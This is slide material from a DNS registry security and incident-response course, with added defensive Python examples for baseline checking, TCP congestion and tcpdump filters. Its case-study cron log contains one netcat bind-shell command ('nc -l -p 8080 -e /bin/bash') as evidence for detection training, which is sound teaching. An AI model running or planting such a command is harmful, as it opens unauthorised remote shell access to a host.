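Run the diff from a host that holds the baseline read-only (or from a checksum of it), not from the name server itself: an attacker who can edit the zone can edit a baseline stored beside it.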
Disruption
Denying, degrading, or otherwise limiting the availability of services provided by a system or application
Packet Floods
Deleting Operating System Files
Disruption Attacks
These attacks target your external servers and/or the links which service them
Regular Queries
How Many Queries per Second Can Your Servers Handle?
How Much Bandwidth Do You Have?
Disruption Attacks
These attacks target your external servers and/or the links which service them; single points of failure
Limited Scale
http://www.ibtimes.com/articles/131421/20110406/anonymous-launches-ddos-attack-on-sony.htm
http://www.darkgovernment.com/news/tsa-data-analyst-planned-cyber-attack/
Others?
Data Exfiltration
Copying data that is not publicly accessible from a network for malicious purposes
Smash & Grab
Corporate Espionage
Motivations
Malicious: Taint the Reputation of a Registry
Financial: Data Ransoming, Identity Theft
http://www.privacyrights.org/data-breach
http://datalossdb.org/
Network Monitoring
Create a Baseline of Your Normal Traffic
Continuously Compare Current Traffic to the Baseline
Persistence
Establishing an unauthorized, constant presence on the network and thwarting administrator removal attempts
Root Kits
Monitoring Administrator Actions
Motivations
Malicious: Desire to Stay Within Your Network to Gain Additional Access or Perform Additional Attacks
Persistence Attacks
These Attacks May Target Any Host in Your Network, from Servers to Workstations
Your External Service Providers are Not Immune Either!
Business & Operations Networks
Persistence Example
An Attacker Compromises a Host Through Phishing
Immediately installs a rootkit to hide evidence of a successful compromise
The rootkit hides files, the interactive shell process, and the network ports which the attacker uses to access the compromised host
Persistence Attacks
http://www.computerworlduk.com/news/security/3288274/microsoft-warns-rootkit-infection-requires-windows-reinstall/?olo=rss
Malicious Use
Using the DNS to propagate malware or conduct attacks in a malicious manner, yet consistent with the DNS protocols
BotNet Command & Control
Amplification Attacks
Motivations
Malicious: Spreading malware through servers hiding behind fictitious DNS registrations
Financial: For-Hire BotNets use DNS for command and control
http://blogs.cisco.com/security/talos/angler-domain-shadowing
Network Monitoring
Know what your expected baseline is; monitor for anomalies
Incident Handling
The project management, lead-the-team work
Unauthorized Access
Denial of service
Presence of malicious logic
Improper Usage
Two views of the process:
Preparation, Detect, Preservation, Duplication, Analysis, Respond, Reporting
Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned
Phases
Preparation, Detection & Analysis, Containment, Eradication, Recovery, Lessons Learned
[Figure: a matrix placing these topics under the phases: Policy, Sensors, Management Support, Deployment, Tool Usage, System Restore, Hot-wash, Logs, Info Sharing, Law/Media, Correlation, Traffic Flow, System Management, Rootkits, Metrics, Exercise, Declaration, Forensics, Polymorphic Code, APT, Repeat Attack, Monitoring, IT/User Interaction, Damage Assessment, Applying Lessons]
Preparation
Containment
Eradication
In order to prevent immediate reinfection, the systems must be purged of any artifacts left by the attacker. This is where they will be cleaned up.
Recovery
Lessons Learned
The importance of documenting what occurred cannot be overstated. There are undoubtedly process improvements and policy changes that need to be made.
[Figure on each phase slide: the cycle Preparation, Detection & Analysis, Containment, Eradication, Recovery, Lessons Learned, with the current phase highlighted]
Forensics
Incident Response Team
Intelligence
Full-time Detection & Analysis
Advanced Traffic Monitoring
Case Study: INCIDENT RESPONSE
The Backstory
You run a ccTLD registry
You have a typical setup consisting of primary and secondary DNS servers and a registry service running on a web server.
For simplicity, assume the web and primary DNS are on the same server hosted in your office / data center
For discussion:
What would your tools tell you?
Do you have visibility into:
cat /etc/group
root@kali:~# cat /etc/group
root:x:0:
daemon:x:1:
admin:x:111:dnsadmin,test,dns
stunnel4:x:129:
sambashare:x:130:
[netstat output on the next slide not recovered beyond the State column: eight LISTEN and three ESTABLISHED sockets]
Cron log from NS1 (day 3)
Time      Host
17:03:07  NS1
17:17:01  NS1
18:17:01  NS1
19:17:01  NS1
20:17:01  NS1
20:58:52  NS1
21:01:54  NS1
21:03:14  NS1
21:03:14  NS1
21:03:20  NS1
21:04:13  NS1
21:04:17  NS1
21:05:47  NS1
21:06:03  NS1
21:06:03  NS1
Entries recovered from the command column (which rows they belong to was not recovered):
cd / && run-parts --report /etc/cron.hourly
test -x /usr/sbin/anacron || ( cd / && run-parts --report
test -x /usr/sbin/anacron || ( cd / && run-parts --report
test -x /usr/sbin/anacron || ( cd / && run-parts --report
nc -l -p 8080 -e /bin/bash
ps aux
(the USER and PID columns were not recovered from this slide)
%CPU %MEM   VSZ   RSS TTY   STAT START TIME COMMAND
 0.1  1.6 74504 16920 ?     Sl   05:00 0:04 gnome-terminal
 0.0  0.0  2088   728 ?     S    05:00 0:00 gnome-pty-helper
 0.0  0.3  6172  3572 pts/0 Ss   05:00 0:00 bash
 0.0  0.1  6472  1104 ?     Ss   06:00 0:00 /usr/sbin/sshd
 0.0  0.0     0     0 ?     S    06:05 0:00 [kworker/0:1]
 0.0  0.0     0     0 ?     S    06:05 0:00 [kworker/0:0]
 0.0  0.2  6056  2416 pts/0 S+   06:07 0:00 ssh root@localhost
 0.0  0.3  9864  3352 ?     Ss   06:07 0:00 sshd: root@pts/2
 0.0  0.4  7168  4384 pts/2 Ss   06:07 0:00 -bash
 0.0  0.0     0     0 ?     S    06:09 0:00 [kworker/0:2]
 0.0  0.5 47820  5836 ?     Sl   06:09 0:00 /usr/lib/packagekit/packagekitd
 0.5  0.3  9916  3404 ?     Ss   06:18 0:00 sshd: test [priv]
 0.0  0.1  9916  1700 ?     S    06:18 0:00 sshd: test@pts/1
 3.0  0.4  7172  4368 pts/1 Ss+  06:18 0:00 -bash
 0.0  0.1  4288  1180 pts/2 R+   06:54 0:00 ps aux
RESILIENT ENTERPRISES
Resiliency
[Figure, adapted from the SEI | CERT Resiliency Management Model: a Service is delivered by Processes, which depend on four asset classes: PEOPLE, INFORMATION, TECHNOLOGY and FACILITIES]
Elements of Resiliency
[Figure: RESILIENCY at the centre, surrounded by Security (mostly physical security, life & limb), Business Continuity (COOP, redundancy, back-ups), Information Assurance / Network Security, and IT Operations]
Resiliency Activities
Resiliency is being able to react to stress without breaking
Resiliency Frameworks
NIST SP 800-53 & ISO 27002: hundreds of security controls grouped into families
(Access Control, Configuration Management, Incident Response, etc.)
Very large, all-encompassing, and intimidating for small organizations
Resiliency Frameworks
CSC (SANS) Top 20
20 things you can do today, includes guidance, recommended tools,
implementation ideas
Consensus of community experts
ASD Examples
Top 4: Application whitelisting; Patch applications; Patch OS; Restrict administrative privileges
Others: Application hardening; Host-based IDS; Disable local administrator accounts; Network segmentation; Multi-factor authentication; Application firewalls; Web filtering; Strong passwords; Network traffic capture; Event logging
Others: Hardware inventory; Software inventory; Vulnerability assessment; Wireless access controls; Control ports/protocols; Boundary defense; Account monitoring; Incident response; Network engineering
The cycle: Monitor > Detect > Analyze > Respond > Recover
With a baseline added: Baseline (do this) before Monitor (this); Detect (quick! your detection time may vary); Analyze; Respond (prevent); Recover (stop effect)
Establishing a Baseline
"If you know the enemy and know yourself, you need not fear the results of a hundred battles."
Architecture
Traffic
People
Processes
Vulnerabilities
Establishing a Baseline
Architecture Baseline
Hosts, Services, Ports, Connections, Addresses
Establishing a Baseline
Architecture Baseline
Document your host configurations, operating systems, applications, versions, etc.
Establishing a Baseline
Architecture Baseline Tools
Visio
Paper / Pencil!
Nagios, OpenNMS, HP OpenView, etc.
Establishing a Baseline
Traffic Baseline
What kind, how much, source / destination, and
usual time
Establishing a Baseline
External Traffic Baseline
How much traffic (packets per second, megabits per
second, etc) is normal on your external links?
What kind of traffic to external servers (e.g. do you
normally have SSH connections to your DNS servers?)
Establishing a Baseline
Traffic Baseline
Again, ideally, you will have this information
readily available during the analysis phase
For example, can you easily answer the question:
Establishing a Baseline
Traffic Baseline Tools
NetFlow
Wireshark
Tcpdump
iperf, dnsperf
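One way to turn the architecture baseline (hosts, services, ports, connections) and the traffic-baseline question above ("do you normally have SSH connections to your DNS servers?") into a check that runs during the monitoring phase. This is an added example, not material from the course or from any of the tools listed: the baseline sets, the netstat-style lines, and the 192.0.2.10, 10.1.1.0/24 and 198.51.100.77 addresses are all constructed for illustration.

```python
"""Check observed sockets against a documented architecture/traffic baseline.

Added example; it is not part of the course material. The baseline and the
netstat-style lines are constructed: the host plays the role of an
authoritative nameserver that should offer only DNS, plus SSH from a
management network.
"""
import ipaddress
from collections import namedtuple

Socket = namedtuple(
    "Socket", "proto local_addr local_port remote_addr remote_port state program"
)

# Documented baseline (constructed): which services are expected to listen,
# and where inbound connections to each service may legitimately come from.
BASELINE_LISTENERS = {
    ("tcp", 53, "named"),
    ("udp", 53, "named"),
    ("tcp", 22, "sshd"),
}
ALLOWED_PEERS = {
    22: [ipaddress.ip_network("10.1.1.0/24")],  # SSH only from the management LAN
}

# Constructed sample in the layout of `netstat -tunap` (Linux net-tools).
OBSERVED = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      1012/named
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1120/sshd
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      4107/nc
tcp        0      0 192.0.2.10:22           10.1.1.5:50122          ESTABLISHED 4031/sshd
tcp        0      0 192.0.2.10:22           198.51.100.77:41234     ESTABLISHED 4110/sshd
udp        0      0 0.0.0.0:53              0.0.0.0:*                           1012/named
"""


def _split_endpoint(endpoint):
    """'10.1.1.5:50122' -> ('10.1.1.5', 50122); '0.0.0.0:*' -> ('0.0.0.0', None)."""
    addr, _, port = endpoint.rpartition(":")
    return addr, (None if port == "*" else int(port))


def parse_netstat(text):
    """Parse netstat -tunap style lines into Socket records."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        proto = fields[0].rstrip("6")
        local_addr, local_port = _split_endpoint(fields[3])
        remote_addr, remote_port = _split_endpoint(fields[4])
        # UDP sockets print no State column, so the PID/Program field is always last.
        state = fields[5] if len(fields) == 7 else ""
        program = fields[-1].partition("/")[2]
        sockets.append(Socket(proto, local_addr, local_port,
                              remote_addr, remote_port, state, program))
    return sockets


def compare_with_baseline(sockets):
    """Return the deviations the monitor should hand to the analysis phase."""
    listening = {(s.proto, s.local_port, s.program)
                 for s in sockets if s.state == "LISTEN" or s.proto == "udp"}
    unexpected_listeners = sorted(listening - BASELINE_LISTENERS)
    missing_listeners = sorted(BASELINE_LISTENERS - listening)
    unexpected_peers = []
    for s in sockets:
        if s.state != "ESTABLISHED":
            continue
        allowed = ALLOWED_PEERS.get(s.local_port)
        if allowed is None:
            continue  # no peer policy documented for this port; the listener check covers it
        if not any(ipaddress.ip_address(s.remote_addr) in net for net in allowed):
            unexpected_peers.append((s.local_port, s.remote_addr, s.program))
    return {
        "unexpected_listeners": unexpected_listeners,
        "missing_listeners": missing_listeners,
        "unexpected_peers": unexpected_peers,
    }


if __name__ == "__main__":
    for kind, items in compare_with_baseline(parse_netstat(OBSERVED)).items():
        print(kind, items)
```

On the constructed input the check flags the extra listener on port 8080 and the SSH session from outside the management network, while the documented DNS and SSH listeners produce no noise. The same comparison runs just as well over a scheduled export of netstat or ss output, which is the point of having the baseline written down before an incident.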
Establishing a Baseline
People Baseline
How do your customers interact with your network?
Web application for processing registration?
Do you typically see people log in at 0330?
Establishing a Baseline
People Baseline
Again, ideally, you will have this information
readily available during the analysis phase
For example, can you easily answer the question:
Establishing a Baseline
People Baseline Tools
Personnel Interviews
How does Bob usually do his job via the network?
Establishing a Baseline
Processes Baseline
Processes typically fuse people and technology
Even though the people and technology may not have
issues, the processes that pull them together might
Processes can be:
Business oriented (e.g. processing user registration
updates)
Operational (e.g. responding to a DDoS attack)
Establishing a Baseline
Process Baseline
Creating a baseline of your processes requires an
understanding of what you do and how you do it!
Again, information should be readily accessible:
Can you easily answer this question:
Establishing a Baseline
Process Baseline Tools
Understand your critical business functions and what's required to provide those functions
Walkthroughs & Reviews
Personnel Interviews & Surveys
See the Attack & Contingency Planning Course
Establishing a Baseline
Vulnerability Baseline
Vulnerabilities in Operating Systems & Applications
Vulnerabilities in Your Business or Operational Processes
Processing registrations, responding to cyber attacks, etc.
Establishing a Baseline
Vulnerability Baseline
To determine technical vulnerabilities, use automated tools
To determine procedural vulnerabilities, think like a bad guy
Establishing a Baseline
Vulnerability Baseline Tools
Nessus, LanGuard, SuperScan, Retina
Process Walkthroughs
Take each of your critical processes and step through
them attempting to identify weaknesses
Establishing a Baseline
Other Sources of Baseline Information:
Ask senior management, and technicians & support staff, about: important assets, perceived threats, security requirements, current security practices, organizational vulnerabilities
WRAP-UP
Questions?
CHECKFREE.COM
Special thanks to Rod Rasmussen of Internet Identity for
contributing source material for this study.
CheckFree.com Background
The largest provider of on-line bill payment services in the United States
1.4 billion transactions every year, and 75% of all ACH (automated clearing house) transactions in the United States
Serves 22 of the top 25 financial institutions in the U.S.
AT&T, Bank of America, Chevron, DIRECTV, and Time Warner Cable, among many others, allow their customers to pay their bills electronically via CheckFree.com services
CheckFree.com Background
December 2, 2008, at about 0030 EST, an attacker modified the authoritative nameserver registration for CheckFree.com
Used an on-line control panel belonging to Network Solutions (CheckFree.com's registrar)
Pointed the registration to Network Solutions' free nameserver at nsXX.worldnic.com
CheckFree.com Background
Customers visiting the site were presented with a
blank page instead of the normal bill payment site.
At best, customers were denied access to their bill
payment service; at worst, customers were infected
with malware.
CheckFree.com Epilogue
The attacker had compromised the control panel username and password CheckFree.com used to access its registration data at Network Solutions. Interestingly enough, Network Solutions had warned its customers of a phishing attack that attempted to solicit credentials via a website spoofed to look like Network Solutions' own site.
The motivation for the attack appeared to be malware distribution.
CheckFree.com Analysis
Hosts in the diagram: CF Customer Site (Utility) at utility.checkfreeweb.com; CF Customer Site (E-Commerce) at ecom.mycheckfree.com; CheckFree.com Bill Pay Server at bank.checkfree.com
Annotated dig output (supplemental):
Query, Answer, Server Queried
Status (as told by the server): NOERROR, NXDOMAIN, SERVFAIL, REFUSED, NOTIMP
Mail servers are found with MX records, not A records
Record types: A, AAAA, NS, MX, TXT
Delegation chain: answer received from a root server, then from a .ORG server, then from the first.org server
Definitions
PERFORMANCE MONITORING
Types of Delay
Causes of end-to-end delay:
Processing delays
Queuing (buffer) delays
Transmission delays
Propagation delays
Processing Delay
Required time to analyze a packet header and decide where to send the packet (e.g. a routing decision)
Inside a router this depends on the number of entries in the routing table, the implementation of data structures, hardware in use, etc.
Queuing Delay
The time from when a packet is enqueued until it is transmitted
The number of packets waiting in the queue depends on the traffic intensity and the type of traffic
Router queuing algorithms try to adapt delays to specific preferences, or impose equal delay on all traffic.
Transmission Delay
The time required to push all the bits of a packet onto the transmission medium in use
For S = size of the packet in bits, N = transmission rate of the link in bits per second, d = delay:
d = S/N
For example, to transmit 1024 bits using Fast Ethernet (100 Mbps):
d = 1024 / (1 x 10^8) s = 10.24 microseconds
Propagation Delay
Once a bit is 'pushed' on to the transmission
medium, the time required for the bit to
propagate to the end of its physical trajectory
The velocity of propagation of the circuit
depends mainly on the actual distance of the
physical circuit
In the majority of cases this is close to the
speed of light.
For d = distance, s = propagation velocity
PD = d/s
Packet Loss
Controls in TCP
IP (Internet Protocol) implements a connectionless service.
There is no mechanism in IP to deal with packet loss.
Behaviors:
Additive Increase / Multiplicative Decrease (AIMD)
Slow Start
React to timeout events
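A round-by-round model of the three TCP behaviors just listed, added here as an example rather than taken from the course: slow start doubles the window each RTT up to ssthresh, additive increase then grows it by one segment per RTT, a loss signalled by duplicate ACKs halves it (Reno-style fast recovery), and a timeout halves ssthresh and restarts slow start from one segment. Window sizes are in segments, and the event schedule passed to the simulation is constructed, not measured.

```python
"""Round-by-round model of TCP congestion control behaviors: slow start,
additive increase / multiplicative decrease, and reaction to timeouts.

Added example (not from the course). cwnd and ssthresh are counted in
segments (MSS) and one loop iteration is one round-trip time; the event
schedule is constructed, not measured.
"""


def simulate_cwnd(rounds, events, ssthresh=16, cwnd=1):
    """Return the congestion window at the start of each RTT.

    events maps a round number to "dupack" (loss signalled by three duplicate
    ACKs, handled Reno-style with fast recovery) or "timeout" (retransmission
    timer expired, which restarts slow start from one segment).
    """
    trace = []
    for rtt in range(rounds):
        trace.append(cwnd)
        event = events.get(rtt)
        if event == "timeout":
            ssthresh = max(cwnd // 2, 2)    # multiplicative decrease
            cwnd = 1                        # back to slow start
        elif event == "dupack":
            ssthresh = max(cwnd // 2, 2)    # multiplicative decrease
            cwnd = ssthresh                 # fast recovery: skip slow start
        elif cwnd < ssthresh:
            cwnd = min(cwnd * 2, ssthresh)  # slow start: exponential growth, capped at ssthresh
        else:
            cwnd += 1                       # congestion avoidance: additive increase
    return trace


# Constructed schedule: a duplicate-ACK loss in round 6, a timeout in round 9.
SAMPLE_EVENTS = {6: "dupack", 9: "timeout"}

if __name__ == "__main__":
    for rtt, window in enumerate(simulate_cwnd(12, SAMPLE_EVENTS)):
        print("RTT %2d  cwnd=%2d %s" % (rtt, window, "#" * window))
```

The printed sawtooth is what a throughput graph of a lossy link looks like: the window climbs quickly, halves on each loss, and collapses to one segment after a timeout, which is why a small sustained loss rate costs far more throughput than the lost bytes alone.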
Load Average
Average number of active processes in the
last 1, 5 and 15 minutes
A simple yet useful measurement
Depending on the machine the acceptable range
considered to be normal can vary:
Multi-processor machines can handle more active
processes per unit of time (than single processor
machines)
top
Some useful interactive keyboard commands for top:
f : Fields management (choose which columns are displayed)
F : Choose the field to sort by
<,> : Move the sort column left or right
u : Show only the processes of a given user
k : Kill a process (send a signal to the chosen PID)
d,s : Change the delay between screen updates
tcpdump
Shows the headers of packets received on a given interface. Optionally filters them using boolean expressions.
Allows you to write the captured packets to a file for later analysis.
Requires administrator (root) privileges, since it must put the network interface (NIC) into promiscuous mode.
tcpdump
Some useful options:
-i : Listen on the given interface
-l : Line-buffer the output (lets you see packets as they are captured, e.g. when piping into another program)
-v, -vv, -vvv : Display more information
-n : Don't convert addresses to names (avoid DNS)
-nn : Don't translate port numbers either
-w : Write raw packets to a file
-r : Read packets from a file created by -w
tcpdump
Boolean expressions:
Using the 'AND', 'OR', 'NOT' operators
Expressions consist of one or more primitives, each of which consists of a qualifier and an ID (name or number):
Expression ::= [NOT] <primitive> [ AND | OR | NOT <primitive> ...]
<primitive> ::= <qualifier> <name|number>
<qualifier> ::= <type> | <address> | <protocol>
<type> ::= host | net | port | port range
<address> ::= src | dst
<protocol> ::= ether | fddi | tr | wlan | ip | ip6 | arp |
tcpdump
Examples:
Show all HTTP traffic that originates from
192.168.1.1
# tcpdump -lnXvvv port 80 and src host 192.168.1.1
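To make the grammar above concrete, here is a small evaluator for that expression language run over packet records, so the example filter can be traced by hand. This is an added example, not code from the course or from tcpdump/libpcap: it implements the NOT / AND / OR operators with pcap's precedence (NOT binds tightest, then AND, then OR), the host, net and port types with optional src/dst qualifiers, and a few protocol keywords; the packet records and their addresses are constructed.

```python
"""Evaluate a tcpdump-style boolean filter against packet records.

Added example, not part of the course or of tcpdump/libpcap: a small
recursive-descent evaluator for the expression grammar shown above
(not / and / or over host, net, port and protocol primitives). Packet
records are constructed dicts, not real captures.
"""
import ipaddress

PROTOCOLS = {"ip", "ip6", "arp", "tcp", "udp", "icmp"}
TYPES = {"host", "net", "port"}
DIRECTIONS = {"src", "dst"}


def tokenize(expr):
    return expr.replace("(", " ( ").replace(")", " ) ").lower().split()


class FilterParser:
    """Builds a tree of tuples: ('or'|'and', a, b), ('not', a),
    ('proto', name) or (type, direction-or-None, value)."""

    def __init__(self, expr):
        self.tokens = tokenize(expr)
        self.pos = 0

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self):
        tok = self.peek()
        self.pos += 1
        return tok

    def parse(self):
        node = self.parse_or()
        if self.peek() is not None:
            raise ValueError("trailing tokens: %r" % self.tokens[self.pos:])
        return node

    def parse_or(self):            # lowest precedence
        node = self.parse_and()
        while self.peek() == "or":
            self.take()
            node = ("or", node, self.parse_and())
        return node

    def parse_and(self):
        node = self.parse_not()
        while self.peek() == "and":
            self.take()
            node = ("and", node, self.parse_not())
        return node

    def parse_not(self):           # highest precedence
        if self.peek() == "not":
            self.take()
            return ("not", self.parse_not())
        return self.parse_primitive()

    def parse_primitive(self):
        tok = self.take()
        if tok == "(":
            node = self.parse_or()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return node
        if tok in PROTOCOLS:
            return ("proto", tok)
        direction = None
        if tok in DIRECTIONS:
            direction, tok = tok, self.take()
        if tok not in TYPES:
            raise ValueError("unexpected token %r" % tok)
        value = self.take()
        if value is None:
            raise ValueError("%s needs a name or number" % tok)
        return (tok, direction, value)


def matches(node, pkt):
    """True if the constructed packet record satisfies the filter tree."""
    kind = node[0]
    if kind == "or":
        return matches(node[1], pkt) or matches(node[2], pkt)
    if kind == "and":
        return matches(node[1], pkt) and matches(node[2], pkt)
    if kind == "not":
        return not matches(node[1], pkt)
    if kind == "proto":
        if node[1] == "ip":
            return pkt["proto"] != "arp"   # in these records everything but ARP rides on IP
        return pkt["proto"] == node[1]
    _, direction, value = node
    for side in ([direction] if direction else ["src", "dst"]):
        if kind == "host" and pkt[side] == value:
            return True
        # 'net' expects CIDR notation here (tcpdump also accepts 192.168.1 style prefixes)
        if kind == "net" and ipaddress.ip_address(pkt[side]) in ipaddress.ip_network(value, strict=False):
            return True
        if kind == "port" and pkt[side + "port"] == int(value):
            return True
    return False


def apply_filter(expr, packets):
    tree = FilterParser(expr).parse()
    return [p for p in packets if matches(tree, p)]


# Constructed packet records (addresses and ports are made up for the example).
PACKETS = [
    {"proto": "tcp", "src": "192.168.1.1", "srcport": 51000, "dst": "10.0.0.5", "dstport": 80},
    {"proto": "tcp", "src": "10.0.0.5", "srcport": 80, "dst": "192.168.1.1", "dstport": 51000},
    {"proto": "tcp", "src": "192.168.1.1", "srcport": 51001, "dst": "10.0.0.5", "dstport": 443},
    {"proto": "udp", "src": "192.168.1.20", "srcport": 5353, "dst": "10.0.0.53", "dstport": 53},
    {"proto": "arp", "src": "192.168.1.1", "srcport": 0, "dst": "192.168.1.254", "dstport": 0},
]

if __name__ == "__main__":
    for pkt in apply_filter("port 80 and src host 192.168.1.1", PACKETS):
        print(pkt)
```

Note how "port 80 and src host 192.168.1.1" keeps only the request packet: the reply has port 80 on the source side but its source host is 10.0.0.5, which is exactly the asymmetry the src/dst qualifiers exist for. The precedence rules matter just as much when writing real filters: "src host 10.0.0.5 or udp and port 53" groups as "src host 10.0.0.5 or (udp and port 53)", and parentheses are needed to mean anything else.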
Wireshark
Wireshark is a graphical packet analyser
based on libpcap, the same library that
tcpdump utilizes for capturing and storing
packets
The graphical interface has some advantages, including:
Hierarchical visualization by protocol (drill-down)
Follow a TCP conversation (Follow TCP Stream)
Colors to distinguish traffic types
Lots of statistics, graphs, etc.
Wireshark
Wireshark is what came after Ethereal.
The combination of tcpdump and Wireshark can be quite powerful. For example:
# tcpdump -i eth1 -A -s1500 -w dump.log port 21
$ sudo wireshark -r dump.log
Supplemental Information
DNS THREATS
Checkfree.com
Disruption Attacks
Delta Risk, LLC 2009